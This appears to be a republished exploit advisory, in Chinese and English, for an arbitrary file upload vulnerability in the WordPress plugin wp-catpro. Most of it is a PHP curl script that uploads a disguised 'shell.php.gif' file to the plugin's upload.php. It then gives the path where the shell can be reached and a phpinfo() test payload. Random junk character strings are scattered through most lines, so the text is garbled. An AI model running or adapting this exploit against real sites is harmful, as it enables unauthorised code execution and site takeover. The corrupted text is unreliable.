WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
' o; c) `( ?7 b" {, C( u1 u#-----------------------------------------------------------------------

7 D2 T8 T8 {  R' }2 ]0 G, V作者  => Zikou-16
邮箱 => zikou16x@gmail.com
1 P' _! I! \& \7 S0 P测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
------------------
: s- g1 a& J+ D3 R( b2 w# 攻击者可以上传 file/shell.php.gif
  _; E' d3 }7 A/ w1 m# ("jpg", "gif", "png")  // Allowed file extensions
% N" ^% |& E) [; _" n  m- |6 i# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
4 H/ P8 ?/ }9 _: q# r4 o------------------
4 V6 ^7 d; O) a  _0 o; ]) L
1 d! u0 V7 Z: B9 o#=> Exploit
-----------
<?php
- w, p9 e' [/ }9 Y/ n3 r
$uploadfile="zik.php.gif";
/ Y9 M& J* k- }  u" t6 W* s$ ^$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
, [2 F3 z% r, N9 N- _5 Lcurl_setopt($ch, CURLOPT_POST, true);
) k( Z8 u2 h( R0 i' [1 o6 xcurl_setopt($ch, CURLOPT_POSTFIELDS,
6 K/ O1 T4 G/ C; \2 C  F5 Farray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
/ h: Q$ R7 K' ]curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
) }3 b! ]( i; K) i: M3 [$postResult = curl_exec($ch);
& g0 t$ V/ H2 r$ p& X/ Qcurl_close($ch);
6 v; |3 [: Z8 V' Z4 |3 L9 U
, e9 U3 t0 Z' Cprint "$postResult";
) R9 E3 x4 c3 c. E5 p
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
* }& H* z; w/ `  X+ \: x  ?>
3 k' Q  y8 u# l; @4 b4 _<?php
phpinfo();
?>